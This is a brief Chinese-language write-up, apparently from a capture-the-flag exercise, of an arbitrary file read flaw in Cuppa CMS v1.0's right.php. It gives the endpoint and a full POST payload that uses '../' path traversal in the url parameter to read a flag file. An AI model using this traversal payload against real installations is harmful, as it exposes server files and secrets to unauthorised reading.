…

漏洞描述：Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

访问/templates/default/html/windows/right.php，POST传payload：id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../flag，然后F12看见flag